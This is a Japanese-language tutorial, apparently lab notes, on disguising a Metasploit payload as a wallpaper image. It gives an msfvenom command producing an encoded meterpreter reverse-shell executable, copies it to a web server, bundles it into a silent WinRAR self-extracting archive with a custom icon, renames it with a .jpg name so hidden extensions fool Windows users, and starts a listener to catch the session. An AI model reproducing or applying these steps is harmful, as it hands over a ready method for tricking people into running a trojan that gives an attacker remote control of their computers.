WinRAR でペイロードと画像ファイルのバインド
wallpaper で検索し背景画像をダウンロード
今回は
https://pixabay.com/images/search/wallpaper/
からダウンロード
次に画像ファイルをアイコンファイルへ変換
これは
https://www.icoconverter.com/
を利用
変換サイズは
64pixels
ビット深度は
8 bits
対象ファイルは 参照をクリックし
先ほどダウンロードしたファイルを選ぶ
あとは Convert をクリックすると変換されるので
Save File で保存
次にWindows10で WInRAR をインストールする
ここまでできたら KaliLinux でペイロードの作成
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.1.134 -f exe -e x86/shikata_ga_nai -i 3 -b '\x00\xff' -o /root/Desktop/evil4.exe
msfvenom コマンドのオプションで
a はアーキテクチャで
-a x86 なら 32bit アーキテクチャ
e はエンコーダの種類
i はエンコーダ回数で
-i 3 なら3回
b は避ける文字
これでペイロードを作成したら
cp /root/Desktop/evil4.exe /var/www/html/share/ cp Downloads/wallpaper.* /var/www/html/share/ service apache2 restart
でペイロードとダウンロードしたico ファイルと画像ファイルをコピー
ダウンロードできるように apache2 の再起動
なお Windows10 で evil4.exe をダウンロードするとき
リアルタイム保護が有効だと削除される
次に
wallpaper.ico
wallpaper.jpeg
の2つを選択した状態で右クリック >
Add to archive… を選び
Archive name を
amazing_wallpaper.rar
として
Create SFX archive
にチェックをいれる
これで exe ファイルになる
Advanced タブをクリック
SFX Options をクリック
Setup タブをクリック
Run after extraction
のとこへ
evil4.exe
wallpaper.jpg
を追記
Modes タブをクリック
silient mode で hide all をクリック
Text and icon タブをクリック
browse… をクリックし
ファイル形式を All files にすると表示される
wallpaper.ico をクリック
Update タブをクリック
update mode を
Extract and update files
Overwrite mode を
Overwrite all files
これでOKをクリック
これで
amazing_wallpaper.exe ができる
これを名前の変更で
amazing_wallpaper.jpg とすると
Windows10 では拡張子が表示されないため
画像ファイルとして扱われる
ここまでできたら KaliLInux でリバースシェルの用意
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.134 exploit
これで
amazing_wallpaper.jpg
をクリックすると
画像が表示され
KaliLinux ではmeterpreter セッションが確立する
